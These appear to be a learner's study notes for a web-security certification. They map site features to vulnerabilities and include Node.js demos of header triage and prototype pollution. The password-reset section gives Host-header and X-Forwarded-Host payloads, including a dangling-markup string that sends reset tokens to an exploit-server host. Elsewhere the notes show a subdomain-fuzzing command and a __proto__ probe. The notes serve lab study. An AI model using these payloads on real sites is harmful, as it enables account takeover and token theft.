Untitled
Write about what kinds of website functions are correlated with certain vulnerabilities. Important page: https://github.com/DingyShark/BurpSuiteCertifiedPractitioner#http-request-smuggling
-
THE MOST IMPORTANT THINGS TO DO AT THE START:
- I AM NOT HACKING, NOT PWNING; I DO NOT HAVE TO FINISH THIS
- I'm curious about how these things work. I want to understand them!!!
- **Check the source code of the pages (including /, the comment section, forgot password, etc.)**
- Check how the actions behave ->
- Is something affecting the cookie? -> maybe we can use it to escalate privileges. Recently I had a situation where the forgot-password utility was changing the username in the cookie, and if I was logged in as a legitimate user I could change the username to administrator
- Is there prototype pollution? Look at whether we can perform an XSS attack or get the request rewritten in the search/comment section (use DOM Invader)
- Are there cache headers? If you see hit/miss values (e.g. in X-Cache), the response passes through a cache and is worth testing for web cache poisoning
- Can you enumerate usernames in the forgot-password section?
- Take a note when you find something but you don't know how to use it - write down how it works and what you see
- Is X-Frame-Options set to SAMEORIGIN (or DENY), or does a CSP frame-ancestors directive restrict framing? If not, you can try clickjacking
- Is a CORS header (Access-Control-Allow-Origin) set? If it reflects the request Origin (or trusts null) together with Access-Control-Allow-Credentials: true, you can try to exfiltrate data via XMLHttpRequest/fetch
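The three header checks above (cache hit/miss, X-Frame-Options / frame-ancestors, CORS) can be triaged from a single captured response. The following is an added example for these notes, not code from the original page or from any tool it mentions: a small Node.js script that takes a response's headers and reports the three findings. The two sample responses at the bottom are constructed for the demo, and the `sentOrigin` value stands for the Origin header you put on the probe request.

```javascript
// Added example, not part of the original notes: triage one response's headers
// for cache markers, frameability (clickjacking) and CORS exfiltration.
// Runs in Node.js with no network; SAMPLE_* below are constructed responses.

function normalise(headers) {
  // Header names are case-insensitive, so compare on lower-cased names.
  const out = {};
  for (const [name, value] of Object.entries(headers)) out[name.toLowerCase()] = String(value).trim();
  return out;
}

// Cache markers: any of these means a cache sits in front of the app, so the
// response is a candidate for web cache poisoning tests.
function cacheMarkers(headers) {
  const h = normalise(headers);
  return ['x-cache', 'cf-cache-status', 'age', 'x-cache-hits'].filter((n) => n in h).map((n) => `${n}: ${h[n]}`);
}

// Clickjacking: can an arbitrary third-party origin frame this page?
// CSP frame-ancestors takes precedence over X-Frame-Options when both exist.
function frameableByThirdParty(headers) {
  const h = normalise(headers);
  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map((d) => d.trim()).find((d) => /^frame-ancestors(\s|$)/i.test(d));
  if (fa) {
    const sources = fa.split(/\s+/).slice(1).map((s) => s.toLowerCase());
    // Only a wildcard or a scheme-only source lets an attacker-controlled origin frame the page.
    return sources.some((s) => s === '*' || s === 'https:' || s === 'http:');
  }
  const xfo = (h['x-frame-options'] || '').toUpperCase();
  // A missing header, or the obsolete ALLOW-FROM, is ignored by browsers: the page is frameable.
  return xfo !== 'DENY' && xfo !== 'SAMEORIGIN';
}

// CORS: given the Origin we sent, is the body readable cross-origin, and with
// the victim's cookies? Returns a finding string or null.
function corsFinding(sentOrigin, headers) {
  const h = normalise(headers);
  const acao = h['access-control-allow-origin'];
  const creds = (h['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  if (!acao) return null;
  if (acao === '*') {
    // Browsers reject '*' for credentialed requests, so only public data is reachable.
    return 'wildcard ACAO: unauthenticated data readable from any origin';
  }
  if (acao === sentOrigin && creds) return 'Origin reflected with credentials: authenticated data readable from attacker origin';
  if (acao === 'null' && creds) return 'null origin trusted with credentials: exploitable from a sandboxed iframe';
  if (acao === sentOrigin) return 'Origin reflected without credentials: only unauthenticated data readable';
  return null;
}

function triage(sentOrigin, headers) {
  return {
    cache: cacheMarkers(headers),
    clickjacking: frameableByThirdParty(headers),
    cors: corsFinding(sentOrigin, headers),
  };
}

// Constructed sample responses (not real captures).
const SAMPLE_WEAK = {
  'Content-Type': 'text/html',
  'X-Cache': 'miss',
  'Access-Control-Allow-Origin': 'https://attacker.example',
  'Access-Control-Allow-Credentials': 'true',
};
const SAMPLE_HARDENED = {
  'Content-Type': 'text/html',
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'",
  'Access-Control-Allow-Origin': 'https://app.example',
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(triage('https://attacker.example', SAMPLE_WEAK));
  console.log(triage('https://attacker.example', SAMPLE_HARDENED));
}
```

The CORS branch ordering matters in practice: a wildcard with `Access-Control-Allow-Credentials: true` is not exploitable for cookie-bearing data because browsers refuse that combination, whereas a reflected Origin or a trusted `null` origin with credentials is the case worth writing a fetch-based exfiltration PoC for.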
-
- check for XSS manually, then with Burp's built-in browser / DOM Invader
- remember the comments section
- canonical link tag (<link rel="canonical" href=...>) - the current URL may be reflected into it
-
perform directory busting and subdomain busting, including GraphQL endpoints
-
check password reset functionality, then brute-force authentication
-
run Param Miner
-
XXE - blind/out-of-band via DNS lookup
app overview
Check what's inside the application, play with it.
- Can you enumerate usernames (more than carlos)?:
- different responses
- response time
- password reset
First user
- XSS all locations
- Dirbusting, the register page and others.
- Forgot password
- CSRF
- Request Smuggling
- Web cache poisoning
dirbusting
First we want to look for hidden files and directories that may contain useful information.
- Use raft-small-words - it contains entries like .git etc.; combine it with extensions like .txt .php .html .js
- Test the API for GraphQL [[GraphQL#finding graphql endpoints]]
- Use Burp -> Target -> Engagement tools -> Discover content
subdomain enumeration
ffuf -u https://FUZZ.lab.id -w /usr/share/wordlist/seclists/Discovery/DNS/subdomains-top1million-20000.txt
(this only finds names that resolve in DNS; for virtual hosts served from one IP, fuzz the Host header instead with -H 'Host: FUZZ.lab.id' and filter out the default response size with -fs)
auth bypass
- Host validation bypass via connection state attack [[Authorization bypass]]
sending data
JSON
- Try to inject the same parameter more than once (duplicate keys), for example
{ "userId": 1, "userId": 2 }
(most JSON parsers keep the last value, some keep the first; look for a mismatch between the component that validates the value and the one that uses it)
- check whether the parameter can be a string or an int
- check whether the parameter can be an object
{"userId": {"blabla":1}}
- if it accepts an object, check whether it is vulnerable to prototype pollution (e.g. a "__proto__" key).
- Try to change the Content-Type and send different content, e.g.
- `Content-Type: www/x`
- perform tests for race conditions (I NEED A LINK HERE)
- SQL/NoSQL injection
- **IF THERE IS A roleID, TRY INTRUDER WITH A LOT OF DIFFERENT NUMBERS**
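The JSON probes above (duplicate keys, type swaps, object wrapping, prototype pollution) are easy to get wrong by hand, so here is an added example for these notes, not code from the original page: a Node.js script that builds the variants for one parameter and shows, with a hypothetical server-side `unsafeMerge` helper beside a hardened `safeMerge`, why the `"__proto__"` probe matters. The request bodies and the `userId` parameter are constructed for the demo.

```javascript
// Added example, not part of the original notes. Bodies and parameter names
// are constructed; unsafeMerge/safeMerge are hypothetical server-side helpers.

// Duplicate keys: V8's JSON.parse keeps the LAST value. If a front-end
// validator reads the first "userId" and the back-end the last, the
// duplicate-key probe slips a second value past the check.
function duplicateKeyWinner(body, key) {
  return JSON.parse(body)[key];
}

// Append a raw key/value pair before the closing brace without going through
// JSON.stringify, which would collapse a duplicate key or drop "__proto__".
function appendKey(body, key, value) {
  const inner = body.trim().slice(1, -1).trim();
  const pair = `${JSON.stringify(key)}: ${JSON.stringify(value)}`;
  return inner ? `{${inner}, ${pair}}` : `{${pair}}`;
}

// Variants of one parameter worth sending through Repeater/Intruder.
function jsonVariants(body, key, altValue) {
  const obj = JSON.parse(body);
  const v = obj[key];
  const withValue = (value) => JSON.stringify({ ...obj, [key]: value });
  return {
    duplicateKey: appendKey(body, key, altValue),              // last-wins vs first-wins mismatch
    asString: withValue(String(v)),                           // int -> string
    asNumber: withValue(Number(v)),                           // string -> int (NaN serialises as null)
    asArray: withValue([v]),                                  // scalar -> array
    asObject: withValue({ blabla: v }),                       // scalar -> object
    protoProbe: appendKey(body, '__proto__', { polluted: 1 }), // prototype pollution probe
  };
}

// A typical recursive merge with no key filtering. JSON.parse turns "__proto__"
// into an OWN property of the parsed object, so the loop reaches it, and
// target['__proto__'] resolves to Object.prototype: the merge walks into it.
function unsafeMerge(target, source) {
  for (const key in source) {
    const val = source[key];
    if (val && typeof val === 'object') {
      if (!target[key] || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened version: own keys only, and never descend through the three keys
// that lead to a prototype.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue;
    const val = source[key];
    if (val && typeof val === 'object' && !Array.isArray(val)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || typeof target[key] !== 'object') target[key] = {};
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Merge an attacker body into an empty config object, then check whether an
// unrelated object created afterwards inherited "isAdmin". Cleans up the
// prototype so the rest of the process is unaffected.
function pollutionDemo(merge) {
  const attackerBody = '{"userId": 1, "__proto__": {"isAdmin": true}}';
  merge({}, JSON.parse(attackerBody));
  const unrelated = {};
  const polluted = unrelated.isAdmin === true;
  delete Object.prototype.isAdmin;
  return polluted;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(jsonVariants('{"userId": 1}', 'userId', 2));
  console.log('unsafeMerge polluted:', pollutionDemo(unsafeMerge));
  console.log('safeMerge polluted:', pollutionDemo(safeMerge));
}
```

In a real target you cannot see the merge, so the observable signal is the `protoProbe` body followed by a request that reads a property the app never set (for example a flag that changes a response), which is what the prototype pollution section later in these notes looks for with DOM Invader on the client side.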
POST general
- check how it reacts to bad characters (use special characters)
- add additional parameters, e.g. a second username
- remove parameters like password and observe the behaviour
POST / HTTP/1.1
Host: xyz
Content-Length: ...

csrf=blabla&username=carlos&username=admin&.....
CSRF
Where it can be:
- form submission (CSRF token not needed or not tied to the session)
- XMLHttpRequest or fetch: a simple form-encoded POST is sent cross-origin even without CORS (only the response is unreadable); a JSON body or custom header triggers a preflight and only works when a permissive CORS policy is in place
XSS
Locations to search
- search query - remember: USE REPEATER FOR THE SEARCH QUERY SO THE BROWSER DOES NOT ENCODE THE PAYLOAD
- login page with autocomplete fields [[Reflected XSS main payloads#credentials steal]]
- error pages - when we request a page like /404 and the response says "/404 not found", the path is reflected and may be vulnerable to XSS; also USE REPEATER
- DOM elements
- web cache poisoning
- request smuggling H2.CL [[Smuggling HTTP 2.0#H2.CL]]
Capture other users' requests
- CSRF (POST data)
- request smuggling
- cookie steal [[Smuggling HTTP 1.1#cookie steal]]
- front-end request rewriting [[Smuggling HTTP 1.1#Identyfing frontend request rewriting]]
- if there is no cache poisoning but some headers are reflected on the page [[Smuggling HTTP 1.1#xss via user agent]]
- H2 response queue poisoning [[Smuggling HTTP 2.0#Response queue poisoning via H2.TE request smuggling]]
- **REMEMBER THAT SOMETIMES YOU NEED TO FIND AN ENDPOINT OTHER THAN / (/ itself may not be vulnerable)** - request smuggling URLs may be /admin, /my-account, some .svg file, etc.
Change email
#todo Race condition in changing email or other parameters (single-endpoint race condition)
http request poisoning
in progress
Password Reset
headers
X-Forwarded-Host: attackerhost
or similar headers:
X-Host
X-Forwarded-Server
X-HTTP-Host-Override
Forwarded
or
X-Forwarded-Scheme: http
X-Forwarded-Host: attackerhost
We can use **Param Miner -> Guess headers**, but remember to **run it on the password reset page**
- Host header change:
Host: YOUR-LAB-ID.web-security-academy.net:arbitraryport
Host: YOUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?
With the second payload the dangling markup turns the rest of the email (including the reset token) into the link's query string, so look in the exploit server log for a request like
GET /?/login'>[…]
tokens
- timestamp-based tokens: if the token is derived from the current time, two requests served in the same tick get the same token
Try to send multiple password reset requests at once. What to do:
- Grab another session cookie along with its CSRF token
- For testing, send two POST requests in parallel to get the token for the same user.
- Check the email
- PoC [[Password reset race condition]]
prototype pollution
Open Burp's browser: Proxy -> Intercept -> Open browser. Open Chrome DevTools -> go to the DOM Invader tab -> reload the page.
comments about last trials
- I didn't check the page sources properly
- I wasn't curious enough about how things work
- I WASN'T CALM, I WAS AGITATED - THIS IS THE MAIN REASON WHY I FAILED